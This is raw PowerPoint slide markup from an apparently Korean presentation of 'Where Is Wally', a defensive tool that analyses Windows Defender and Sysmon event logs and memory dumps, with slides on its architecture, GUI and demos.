              <a:t>이벤트 로그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>로 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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051F7-54A9-4DC6-AFF4-EADC1FD514CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="9149090"/>
            <a:ext cx="12420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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-&gt;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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>해당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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>이벤트 로그를 보여주는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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>‘Load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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Defender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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Log’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/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 기능 구현</a:t>
            </a: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9C27EC24-1107-4954-AE5D-F3C2AB8791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8" t="49863" b="10555"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3731132"/>
            <a:ext cx="11853884" cy="51174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854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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Real-time Detect : GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50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8CF425A3-850F-4A7B-B864-7BCF8474B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227" y="2095500"/>
            <a:ext cx="10479334" cy="784860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1147D534-76ED-4969-AF1E-1D81C11E6C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12382292" y="3775306"/>
            <a:ext cx="5486400" cy="1998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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Severity Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1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2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1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2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Detail Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Defender Event Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>로 기록된 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>가장 최신 항목의 데이터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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74044009-DA03-429E-B1F9-9B3B967C34AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384066" y="3813942"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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1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F7FA7CE5-4353-448D-95A1-907E498AC374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3216019"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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1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BC49FD2-E3D1-403C-A697-EEF5B78E22E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12382292" y="6510389"/>
            <a:ext cx="5486400" cy="1319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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Recently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1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2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Event Log Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>최근 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>개의 로그 정보</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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FCA53BAD-65E8-4226-B0D2-079448F280D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384066" y="6530389"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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2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96084C3-9F6A-4D05-8D98-9B9F79E2E5BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9600151" y="7045664"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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2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2923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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>WIW       : Tool Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="_x292825048">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7730AC24-6FCD-4A81-BDEE-9BA7ABE49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674" y="2400300"/>
            <a:ext cx="12968146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_x292825048">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A69F6DB-FA6A-49E6-B64C-FA8DE9134F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5" t="39345" b="25872"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3699820" y="2324099"/>
            <a:ext cx="10287000" cy="243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_x292825048">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E31D38E-262E-4EB4-ABD7-C8D2CB4E25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5" t="3046" b="62171"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3699820" y="4648198"/>
            <a:ext cx="10287000" cy="243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53408E8-A0AF-43EC-90AF-04E1876A5431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010653" y="1441822"/>
            <a:ext cx="3944182" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Where Is Wally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30791745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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>WIW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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5B0F93-4F82-4102-BDF0-0E7776E92D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264695" y="3896356"/>
            <a:ext cx="3944182" cy="1998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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>* NEW Event Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; Sysmon event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  저장하여 분석을 진행함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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B75701-898E-4BCA-8C6F-A698C943C726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264695" y="6891167"/>
            <a:ext cx="3944182" cy="1998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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>* Load Event Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>기존에 탐지를 진행했던 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>이벤트 분석 결과를 불러옴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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1C5575-1677-4EA1-B97D-359DAF5E5FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010653" y="1441822"/>
            <a:ext cx="3944182" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Where Is Wally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446582-AB66-4BA3-97A4-ADE299773F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260684" y="3008560"/>
            <a:ext cx="3944182" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="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시연 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="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Event Analysis]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="KakaoTalk_20201122_222721175">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E48E86-D374-4D08-8BAD-AF8F164E89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26751" y="18047"/>
            <a:ext cx="14261249" cy="1026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7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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>WIW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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0D8820-41A1-469A-BD4F-8EC335F5BC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260684" y="3896356"/>
            <a:ext cx="3944182" cy="2677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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>* NEW Memory Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>클릭을 시점으로 해당 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>의 메모리를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>덤프하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>분석을 진행함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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6F6DFA-07D4-4AD5-A3B5-6D96658DCF38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260684" y="6891167"/>
            <a:ext cx="3944182" cy="1998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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>* Load Memory Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>기존에 탐지를 진행했던 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>메모리 분석 결과를 불러옴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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71D545-982C-4D22-9D38-1A38E9F550B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010653" y="1441822"/>
            <a:ext cx="3944182" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Where Is Wally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99CA92-0E28-4875-B027-8E0CB2AC793E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260684" y="3008560"/>
            <a:ext cx="3944182" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="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시연 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="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Memory Analysis]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="KakaoTalk_20201122_222806926">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB329EE-C69C-48F7-8A41-44EA2AC0BC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54088" y="0"/>
            <a:ext cx="14286312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9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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>WIW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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0D8820-41A1-469A-BD4F-8EC335F5BC0D}"/>
              </a:ext>
